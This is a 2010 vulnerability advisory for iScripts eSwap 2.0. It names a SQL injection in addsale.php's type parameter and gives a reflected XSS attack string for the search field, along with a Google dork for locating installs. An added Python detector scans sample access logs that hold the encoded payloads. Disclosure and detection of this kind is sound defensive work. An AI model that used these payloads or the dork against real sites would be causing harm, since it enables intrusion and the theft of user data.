iScripts eSwap 2.0 Cross Site Scripting / SQL Injection

Published: 07 Jun 2010 | Reported by: Sid3^effects | Type: packetstorm | Source: packetstormsecurity.com

iScripts eSwap 2.0 allows virtual swapmeet creation with listing, selling, buying, fee charging, payment support, and admin control. Version 2.0 is vulnerable to SQL injection and cross-site scripting (XSS).

Code
```text
# Title: iScripts eSwap v2.0 sqli and xss vulnerability
# Author: Sid3^effects
# Published: 2010-06-05
# price: $99.95
# email: [email protected]
# vendor: iScripts
# url: http://www.iscripts.com/eswap/
# google dork: Powered by iScripts eSwap.

############################################################################

ooooo .oooooo. oooooo oooooo oooo
`888' d8P' `Y8b `888. `888. .8'
888 888 `888. .8888. .8'
888 888 `888 .8'`888. .8'
888 888 `888.8' `888.8'
888 `88b ooo `888' `888'
o888o `Y8bood8P' `8' `8'

--------------------------------------------------------------------------------------

#####################Sid3^effects aKa HaRi##################################

#Greetz to all Andhra Hackers and ICW Members [Indian Cyber Warriors]
#Thanks: *L0rd ÇrusAdêr*, d4rk-blu™®, R45C4L idi0th4ck3r, CR4C|< 008, M4n0j, MaYuR
#ShouTZ: kedar, dec0d3r, 41.w4r10r
#spl shoutz: LiquidWorm, gunslinger_ :D
#Catch us at www.andhrahackers.com or www.teamicw.in

############################################################################
Description:

iScripts eSwap enables you to create a virtual swapmeet site in minutes. End users can list items for swap, sale or purchase. Let end users swap unwanted items for things they want! Users can add items for sale or swap. They can also add a wish list of items they want to trade for. eSwap lets you charge users a fee for listing, featured listing and an optional escrow service. Credit card payments through Authorize.net, PayPal, 2Checkout and Google Checkout are supported, as are offline payment methods. The powerful admin section allows you to have multiple categories and sub-categories and to control every aspect of the business. This exchange platform is the ultimate green business, helping your users to recycle.
############################################################################

SQL injection and XSS are found in the eSwap script v2.0.

Xploit: \m/ sqli \m/

demo url: http://www.iscripts.com/eswap/demo/addsale.php?type=[Sqli]

Xploit: \m/ Xss \m/

XSS is found in the search field :D

Attack pattern: '"--><script>alert(0x000872)</script>

demo url: http://www.iscripts.com/eswap/demo/search.php

############################################################################

#Sid3^effects
```
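Detection logic for the two request patterns the advisory names, as an added example that is not part of the advisory or of the eSwap product: it parses constructed web-server access-log lines and flags the `type` parameter of `addsale.php` when it carries SQL meta-characters, and any `search.php` parameter when it carries tag-breakout sequences such as the advisory's attack pattern. The log lines and the `q` parameter name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (not taken from the advisory). The paths
# match the endpoints the advisory names; the parameter values are illustrative.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jun/2010:10:12:01 +0000] "GET /eswap/addsale.php?type=sale HTTP/1.1" 200 4123
10.0.0.5 - - [07/Jun/2010:10:12:09 +0000] "GET /eswap/addsale.php?type=1%27%20OR%201%3D1-- HTTP/1.1" 200 4123
10.0.0.6 - - [07/Jun/2010:10:13:44 +0000] "GET /eswap/search.php?q=bicycle HTTP/1.1" 200 2210
10.0.0.6 - - [07/Jun/2010:10:13:50 +0000] "GET /eswap/search.php?q=%27%22--%3E%3Cscript%3Ealert(0x000872)%3C/script%3E HTTP/1.1" 200 2210
"""

# Pulls method and request target out of a Common Log Format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Heuristics: quote/comment/boolean-tautology sequences for the SQLi sink,
# tag and attribute breakout sequences for the reflected-search sink.
SQLI_RE = re.compile(r"('|--|/\*|\bor\b\s+\d+\s*=\s*\d+|\bunion\b)", re.I)
XSS_RE = re.compile(r"(<script|</script|-->|javascript:|onerror\s*=)", re.I)

def inspect_request(target):
    """Return (rule, param, decoded_value) for a suspicious URL target, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decodes once; a second pass catches double encoding.
        value = unquote_plus(value)
        if script == "addsale.php" and name == "type" and SQLI_RE.search(value):
            return ("eswap-addsale-sqli", name, value)
        if script == "search.php" and XSS_RE.search(value):
            return ("eswap-search-xss", name, value)
    return None

def scan_log(text):
    """Return [(client_ip, rule, param, value)] for every flagged log line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = inspect_request(m.group("target"))
        if finding:
            hits.append((line.split()[0],) + finding)
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s %s param=%s value=%r" % hit)
```

Tune the regexes to the deployment's normal traffic before alerting on them; a bare `'` in `type` is a strong signal only because the advisory's endpoint expects a short enumerated value there.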
